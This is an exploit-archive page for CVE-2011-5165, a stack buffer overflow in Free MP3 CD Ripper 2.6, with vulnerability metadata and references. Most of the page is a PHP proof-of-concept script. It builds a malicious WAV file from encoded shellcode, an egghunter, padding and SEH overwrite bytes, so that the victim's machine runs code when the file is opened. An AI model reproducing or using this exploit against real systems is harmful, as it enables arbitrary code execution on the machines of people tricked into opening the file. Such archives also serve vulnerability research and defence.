Free MP3 CD Ripper 2.6 (wav) stack buffer overflow PoC exploit

2012.09.17

Credit: mr_me

Risk: High

Local: Yes

Remote: No

CVE: CVE-2011-5165

CWE: CWE-119

CVSS Base Score: 9.3/10

Impact Subscore: 10/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: Complete

Integrity impact: Complete

Availability impact: Complete

<?php
/*~~~~~~~~~~~~~~~~~
Free MP3 CD Ripper 2.6 (wav) 1day stack buffer overflow PoC exploit
Found by: Richard leahy
Author: mr_me - http://net-ninja.net/
Download: http://www.soft32.com/Download/Free/Free_MP3_CD_Ripper/4-250188-1.html
Platform: Windows XP sp3
Greetz to: Corelan Security Team & Richard
http://www.corelan.be:8800/index.php/security/corelan-team-members/
~~~~~~~~~~~~~~~~~
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !

Note : you are not allowed to edit/modify this code. 
If you do, Corelan cannot be held responsible for any damages this may cause.
~~~~~~~~~~~~~~~~~
*/

$___eggsig = "\x57\x30\x30\x54\x57\x30\x30\x54";
// alpha3 encoded with edi as base reg
// edi points directly after our tag thanks to the egghunter :)
$___sc = "hffffk4diFkDwj02Dwk0D7AuEE8L3I4U3M4P0E310k7M0m2y0y2l0z".
"0r0s2H0t2n0s7l0h2O0d2A111l0f2B14031P0C0s1K0x7l122O100C0v2N0q2I".
"0p7K0q2E0c0s0p0s132N0r0V0p100i0d180r0r2z0z2j1K7o1K130w0L0t1l0t".
"0b0w7O1M1K0a2v0w2Z1N150s7m0w7L0r2H0r2z0z7n1N2n1P2L0u7k1L7k0a7l".
"1P130q1O0z090a2o1L7k0a141L2B0s0U1K0v0v2C0y2B1N2C1N061O7n0x7K0u".
"7k0t7L0x0b0y2M0t110s0E0y2N0z7o1L0V0w7l0g7K0v2y0t7O0s2D0y2C1L7l".
"0c2u0v2z0t0d0z080r1k1L7l0s101P091N130a7m0w060s0K1M2E1M150w2B1M".
"7K0w7M0z7n1K2B1P100q2O0t2E1O2O1P7O0a120z2G0t1O1P2L0r1M1L2J0c09".
"0a1L1K7p0a010u0x1M170v0r0u7o1N2x1M100s2N0u2N0y0z0z2A1O2q0x7N0p".
"190a7N0s0n1K7O0z040t7l0f140u0M1M0S1K2Z1K160t061P051K061O0z0r07".
"0r1P0r7o0r160s0I0s2o00VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE0".
"2DWF0D71DJE8L3I4U3M4P0E316K7M6M691ILL1J1B1E181DLN1E7L6L6O1U611".
"O1L1W6215131Q1E6PLK1ILL1LLO111E1FLN1GLM1D7K6P641W136PLM13LN1C1".
"W1D6P1Y1U191B1B7K1KLL1M7L16131F1MLO1L1D7L197O1M1J1P601F7Z10151".
"BLK19681C7L1B7J1L7O1J1O1Q681D1K1J7K7M121P13LO1O1K181PLN1MLO1V1".
"T1M621B1T1K1G1G631H621K621O1711681H7M1E681D1Q1H1R1H7L1E10LO1N1".
"ILN1KLO1K1H1F1B1W7K1F691D7N1B651M1U1MLM1V651F1T1D1T1K19191M1M1".
"B1B1D1Q181K171PLM1B161B1M1M141M111D131M7J1C1Y1KLO1M121P161ALO1".
"C191I1A1P7O1Q1216691D1O1Q7M1C1L1M7K7M681Q1M10141P161E681M161B1".
"21DLN1O691M101B7O1D7O1M7Z1K601K1Q1H7K1D1H1Q7O1B6O1K1Q1K1R1ELL1".
"V121D1M1L101J7Z1M7K1E161Q151J171J1K1C161B1QLN131CLM1B1ILMLO01W".
"WYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIA".
"IAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30AP".
"B944JB3Y9Q8YJN8Y2QJT0X0P0Y0I0I0I0I0C0C0C0C0C0C0Q0Z0V0T0X03000V".
"0X04110P0011030H0H00110000110B11110B0T11110Q02110B020B0B000B0B".
"0X0P08110C0J0J0I0K0L0J0H0G040C000E0P0E0P0L0K0Q0U0G0L0L0K0C0L0E".
"0U0B0X0E0Q0J0O0L0K0P0O0E0H0L0K0Q0O0Q000C010J0K0Q0Y0L0K0P040L0K".
"0C010J0N0F0Q0I0P0L0Y0N0L0M0T0I0P0B0T0E0W0I0Q0I0Z0D0M0C010H0B0J".
"0K0L040G0K0P0T0G0T0E0T0C0E0K0U0L0K0Q0O0G0T0E0Q0J0K0E060L0K0D0L".
"0P0K0L0K0Q0O0E0L0C010J0K0L0K0E0L0L0K0E0Q0J0K0L0I0Q0L0F0D0D0D0H".
"0C0Q0O0P010J0V0E000P0V0B0D0L0K0Q0V0P000L0K0Q0P0D0L0L0K0D000E0L".
"0N0M0L0K0C0X0E0X0K090J0X0M0S0I0P0B0J0P0P0C0X0J0P0M0Z0D0D0Q0O0E".
"080J080K0N0L0J0D0N0P0W0K0O0M070B0C0C0Q0B0L0B0C0C001111KPA";

$___offset = str_repeat("\x41",(4116-strlen($___eggsig)-strlen($___sc)));
$___nseh = "\xeb\x06\x90\x90";
$___seh = "\x9e\x2e\xe4\x66";
$___hunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74".
"\xEF\xB8\x57\x30\x30\x54\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
$___buff = str_repeat("\x41",300);
$_____b00m = $___eggsig.$___sc.$___offset.$___nseh.$___seh.$___hunter.$___buff;
file_put_contents("cst-freemp3cdripper.wav",$_____b00m);
?>

References:

http://www.securityfocus.com/bid/39672

http://www.osvdb.org/63349

http://www.exploit-db.com/exploits/18142

http://www.exploit-db.com/exploits/17727

http://www.exploit-db.com/exploits/11976

http://www.exploit-db.com/exploits/11975

http://secunia.com/advisories/39193

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Free MP3 CD Ripper 2.6 (wav) stack buffer overflow PoC exploit

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.